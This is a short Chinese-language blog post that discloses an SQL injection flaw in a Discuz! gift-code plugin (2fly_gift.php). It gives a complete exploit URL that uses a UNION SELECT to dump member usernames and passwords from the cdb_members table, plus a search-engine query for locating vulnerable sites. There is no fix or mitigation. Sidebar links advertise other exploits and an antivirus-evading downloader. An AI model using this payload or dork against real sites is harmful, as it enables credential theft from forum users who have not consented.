Discuz!账号发放插件注入0day

首页 > 技术文章 > Discuz!账号发放插件注入0day

Discuz!账号发放插件注入0day

2009年8月15日 Chinadu 发表评论 192 views 阅读评论

作者：普瑞斯特

Discuz账号发放插件注入0day

插件名:2Fly礼品(序号)发放系统
漏洞文件:2fly_gift.php
版本:最新版
Exp:

http://www.xxx.com/2fly_gift.php?pages=content&gameid=16 and 1=2 union select 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from cdb_members
搜索引擎特征:inurl:2fly_gift.php
上图:
200908141228238711
200908141228366411

2010年03月12日 -- Discuz! 7.2 最新注入漏洞分析与利用
2009年08月28日 -- dedecms 5.3 – 5.5注入漏洞
2008年11月9日 -- Discuz! $_DCACHE数组变量覆盖漏洞
2012年02月10日 -- Xpath SQL Injection
2011年06月6日 -- Easy Media Script SQL Injection Vulnerability
2011年05月12日 -- Joomla Component com_hello SQL Injection Vulnerability
2010年06月10日 -- 你还敢执行txt文件吗？Windows 0day
2010年06月6日 -- Havij v1.1 Advanced SQL Injection
2010年05月21日 -- 橙色预警：PHP PATH_INFO 存在漏洞
2010年05月8日 -- PhpCms 2008 Sp3 Blind SQL Injection Exploit(2)

分类: 技术文章标签: 0day, Discuz, Plugins, SQL Injection, 注入

评论 (0) Trackbacks (0) 发表评论 Trackback

本文目前尚无任何评论.

本文目前尚无任何 trackbacks 和 pingbacks.

最简单的下载者过NOD32 卡巴等启发[VC Delphi两个版本] WordPress Plugin WP-Syntax < = 0.9.1 Remote Command Execution PoC

Chinadu's Blog

Discuz!账号发放插件注入0day

相关文章

About Me

站内搜索

日历

最新文章

热门文章

近期评论

文章归档

Categories

Blogroll

Archives

2012 年二月
一	二	三	四	五	六	日
« 一
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29